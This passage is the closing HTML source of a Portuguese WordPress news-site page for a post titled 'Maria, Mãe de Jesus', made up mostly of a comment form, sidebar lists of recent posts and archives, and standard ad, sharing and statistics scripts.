src="http://oiguassu.com/wp-content/uploads/2020/09/peixe-2.jpg" alt="" width="300" height="240" /></a></p>

<div style="font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;"></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Compartilhe isso:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-27363" class="share-twitter sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=twitter" target="_blank" title="Clique para compartilhar no Twitter"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Twitter(abre em nova janela)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-27363" class="share-facebook sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=facebook" target="_blank" title="Clique para compartilhar no Facebook"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Facebook(abre em nova janela)</span></a></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=telegram" target="_blank" title="Clique para compartilhar no Telegram"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Telegram(abre em nova janela)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=jetpack-whatsapp" target="_blank" title="Clique para compartilhar no WhatsApp"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no WhatsApp(abre em nova janela)</span></a></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-27363" class="share-skype sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=skype" target="_blank" title="Clique para compartilhar no Skype"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no Skype(abre em nova janela)</span></a></li><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-27363" class="share-linkedin sd-button share-icon no-text" href="https://oiguassu.com/maria-mae-de-jesus/?share=linkedin" target="_blank" title="Clique para compartilhar no LinkedIn"><span></span><span class="sharing-screen-reader-text">Clique para compartilhar no LinkedIn(abre em nova janela)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Relacionado</em></h3>
</div>	</div>
	</article><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "MARIA, MÃE DE JESUS"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/maria-mae-de-jesus/#respond" style="display:none;">Cancelar resposta</a></small></h3><form action="https://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form"><p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='27363' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="720f4bfb77" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="218"/></p></form>	</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div>
		<div id="recent-posts-2" class="sb-widget clearfix widget_recent_entries">
		<h4 class="widget-title"><span>Posts recentes</span></h4>
		<ul>
											<li>
					<a href="https://oiguassu.com/uma-carta-de-natal/">UMA CARTA DE NATAL</a>
									</li>
											<li>
					<a href="https://oiguassu.com/fronteira-pcpr-tem-7121-de-elucidacao-de-homicidios-em-foz-do-iguacu/">Fronteira: PCPR tem 71,21% de elucidação de homicídios em Foz do Iguaçu</a>
									</li>
											<li>
					<a href="https://oiguassu.com/triplice-fronteira-governo-paraguaio-quer-continuidade-da-abertura-da-ponte-da-amizade/">Tríplice Fronteira: GOVERNO PARAGUAIO QUER CONTINUIDADE DA &#8220;ABERTURA&#8221; DA PONTE DA AMIZADE</a>
									</li>
											<li>
					<a href="https://oiguassu.com/foz-do-iguacu-ministerio-publico-move-duas-novas-acoes-contra-reni/">Foz do Iguaçu: MINISTÉRIO PÚBLICO MOVE DUAS NOVAS AÇÕES CONTRA RENI</a>
									</li>
											<li>
					<a href="https://oiguassu.com/deus-e-pai-e-deseja-nosso-bem/">DEUS É PAI, E DESEJA NOSSO BEM!</a>
									</li>
					</ul>

		</div><div id="recent-comments-2" class="sb-widget clearfix widget_recent_comments"><h4 class="widget-title"><span>Comentários</span></h4><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link">Clóvis</span> em <a href="https://oiguassu.com/opiniao-nao-se-iludam-dias-piores-virao/#comment-514">Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO</a></li><li class="recentcomments"><span class="comment-author-link">Clóvis</span> em <a href="https://oiguassu.com/opiniao-nao-se-iludam-dias-piores-virao/#comment-513">Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO</a></li><li class="recentcomments"><span class="comment-author-link">Clóvis</span> em <a href="https://oiguassu.com/opiniao-nao-se-iludam-dias-piores-virao/#comment-512">Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO</a></li><li class="recentcomments"><span class="comment-author-link">Wilson De Almeida júnior</span> em <a href="https://oiguassu.com/opiniao-nao-se-iludam-dias-piores-virao/#comment-511">Opinião &#8211; NÃO SE ILUDAM, DIAS PIORES VIRÃO</a></li><li class="recentcomments"><span class="comment-author-link">Michel</span> em <a href="https://oiguassu.com/politica-tce-determina-interrupcao-de-desperdico-de-r-300-mil-do-erario-no-legislativo-iguacuense/#comment-507">Política: TCE DETERMINA INTERRUPÇÃO DE DESPERDÍCIO DE R$ 300 MIL DO ERÁRIO NO LEGISLATIVO IGUAÇUENSE</a></li></ul></div><div id="archives-2" class="sb-widget clearfix widget_archive"><h4 class="widget-title"><span>Arquivos</span></h4>
			<ul>
					<li><a href='https://oiguassu.com/2020/12/'>dezembro 2020</a></li>
	<li><a href='https://oiguassu.com/2020/11/'>novembro 2020</a></li>
	<li><a href='https://oiguassu.com/2020/10/'>outubro 2020</a></li>
	<li><a href='https://oiguassu.com/2020/09/'>setembro 2020</a></li>
	<li><a href='https://oiguassu.com/2020/08/'>agosto 2020</a></li>
	<li><a href='https://oiguassu.com/2020/07/'>julho 2020</a></li>
	<li><a href='https://oiguassu.com/2020/04/'>abril 2020</a></li>
	<li><a href='https://oiguassu.com/2020/03/'>março 2020</a></li>
	<li><a href='https://oiguassu.com/2019/12/'>dezembro 2019</a></li>
	<li><a href='https://oiguassu.com/2019/11/'>novembro 2019</a></li>
	<li><a href='https://oiguassu.com/2019/10/'>outubro 2019</a></li>
	<li><a href='https://oiguassu.com/2019/09/'>setembro 2019</a></li>
	<li><a href='https://oiguassu.com/2019/08/'>agosto 2019</a></li>
	<li><a href='https://oiguassu.com/2019/07/'>julho 2019</a></li>
	<li><a href='https://oiguassu.com/2019/06/'>junho 2019</a></li>
	<li><a href='https://oiguassu.com/2019/05/'>maio 2019</a></li>
	<li><a href='https://oiguassu.com/2019/04/'>abril 2019</a></li>
	<li><a href='https://oiguassu.com/2019/03/'>março 2019</a></li>
	<li><a href='https://oiguassu.com/2019/02/'>fevereiro 2019</a></li>
	<li><a href='https://oiguassu.com/2019/01/'>janeiro 2019</a></li>
	<li><a href='https://oiguassu.com/2018/12/'>dezembro 2018</a></li>
	<li><a href='https://oiguassu.com/2018/11/'>novembro 2018</a></li>
	<li><a href='https://oiguassu.com/2018/10/'>outubro 2018</a></li>
	<li><a href='https://oiguassu.com/2018/09/'>setembro 2018</a></li>
	<li><a href='https://oiguassu.com/2018/08/'>agosto 2018</a></li>
	<li><a href='https://oiguassu.com/2018/07/'>julho 2018</a></li>
	<li><a href='https://oiguassu.com/2018/06/'>junho 2018</a></li>
	<li><a href='https://oiguassu.com/2018/05/'>maio 2018</a></li>
	<li><a href='https://oiguassu.com/2018/04/'>abril 2018</a></li>
	<li><a href='https://oiguassu.com/2018/03/'>março 2018</a></li>
	<li><a href='https://oiguassu.com/2018/02/'>fevereiro 2018</a></li>
	<li><a href='https://oiguassu.com/2018/01/'>janeiro 2018</a></li>
	<li><a href='https://oiguassu.com/2017/12/'>dezembro 2017</a></li>
	<li><a href='https://oiguassu.com/2017/11/'>novembro 2017</a></li>
	<li><a href='https://oiguassu.com/2017/10/'>outubro 2017</a></li>
	<li><a href='https://oiguassu.com/2017/09/'>setembro 2017</a></li>
	<li><a href='https://oiguassu.com/2017/08/'>agosto 2017</a></li>
			</ul>

			</div><div id="categories-2" class="sb-widget clearfix widget_categories"><h4 class="widget-title"><span>Categorias</span></h4>
			<ul>
					<li class="cat-item cat-item-7"><a href="https://oiguassu.com/category/argentina/">Argentina</a>
</li>
	<li class="cat-item cat-item-4"><a href="https://oiguassu.com/category/brasil/">Brasil</a>
</li>
	<li class="cat-item cat-item-9"><a href="https://oiguassu.com/category/colunas/">Colunas</a>
</li>
	<li class="cat-item cat-item-17"><a href="https://oiguassu.com/category/colunas/e-direito/">É Direito</a>
</li>
	<li class="cat-item cat-item-312"><a href="https://oiguassu.com/category/economia/">Economia</a>
</li>
	<li class="cat-item cat-item-702"><a href="https://oiguassu.com/category/espaco-cristao/">Espaço Cristão</a>
</li>
	<li class="cat-item cat-item-725"><a href="https://oiguassu.com/category/colunas/espaco-cristao-colunas/">Espaço Cristão</a>
</li>
	<li class="cat-item cat-item-6"><a href="https://oiguassu.com/category/foz/">Foz do Iguaçu</a>
</li>
	<li class="cat-item cat-item-14"><a href="https://oiguassu.com/category/internacional/">Internacional</a>
</li>
	<li class="cat-item cat-item-12"><a href="https://oiguassu.com/category/latinoamerica/">Latinoamerica</a>
</li>
	<li class="cat-item cat-item-8"><a href="https://oiguassu.com/category/paraguay/">Paraguay</a>
</li>
	<li class="cat-item cat-item-5"><a href="https://oiguassu.com/category/parana/">Paraná</a>
</li>
	<li class="cat-item cat-item-308"><a href="https://oiguassu.com/category/politica/">Política</a>
</li>
	<li class="cat-item cat-item-370"><a href="https://oiguassu.com/category/triplice-fronteira/">Tríplice Fronteira</a>
</li>
	<li class="cat-item cat-item-170"><a href="https://oiguassu.com/category/trump/">tRUMP</a>
</li>
	<li class="cat-item cat-item-703"><a href="https://oiguassu.com/category/ultima-hora/">Última Hora</a>
</li>
	<li class="cat-item cat-item-1"><a href="https://oiguassu.com/category/uncategorized/">Uncategorized</a>
</li>
			</ul>

			</div><div id="meta-2" class="sb-widget clearfix widget_meta"><h4 class="widget-title"><span>Meta</span></h4>
		<ul>
						<li><a rel="nofollow" href="https://oiguassu.com/wp-login.php">Acessar</a></li>
			<li><a href="https://oiguassu.com/feed/">Feed de posts</a></li>
			<li><a href="https://oiguassu.com/comments/feed/">Feed de comentários</a></li>

			<li><a href="https://br.wordpress.org/">WordPress.org</a></li>
		</ul>

		</div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2020 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/oiguassu.com\/maria-mae-de-jesus\/":27363};
	</script>
				<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=5.6' id='comment-reply-js'></script>
<script type='text/javascript' id='jetpack-carousel-js-extra'>
/* <![CDATA[ */
var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"pt","ajaxurl":"https:\/\/oiguassu.com\/wp-admin\/admin-ajax.php","nonce":"0fc805b2d3","display_exif":"1","display_comments":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Coment\u00e1rio","post_comment":"Publicar coment\u00e1rio","write_comment":"Escreva um Coment\u00e1rio","loading_comments":"Carregando coment\u00e1rios...","download_original":"Visualizar tamanho original <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Certifique-se de enviar algum texto com o seu coment\u00e1rio.","no_comment_email":"Informe um endere\u00e7o de e-mail para comentar.","no_comment_author":"Forne\u00e7a seu nome para comentar.","comment_post_error":"Desculpe, mas ocorreu um erro ao postar seu coment\u00e1rio. Tente novamente mais tarde.","comment_approved":"Seu coment\u00e1rio foi aprovado.","comment_unapproved":"Seu coment\u00e1rio est\u00e1 aguardando modera\u00e7\u00e3o.","camera":"C\u00e2mera","aperture":"Abertura","shutter_speed":"Velocidade do Obturador","focal_length":"Comprimento Focal","copyright":"Direito autoral","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/oiguassu.com\/wp-login.php?redirect_to=https%3A%2F%2Foiguassu.com%2Fmaria-mae-de-jesus%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">E-mail (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Nome (obrigat\u00f3rio)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Site<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=8.9.1' id='jetpack-carousel-js'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=5.6' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='https://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.7' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=8.9.1' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-telegram', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-skype', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-linkedin', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
				return false;
			});
</script>
<script type='text/javascript' src='https://stats.wp.com/e-202051.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:8.9.1',blog:'12891280',post:'27363',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '27363' ]);
</script>
</body>
</html>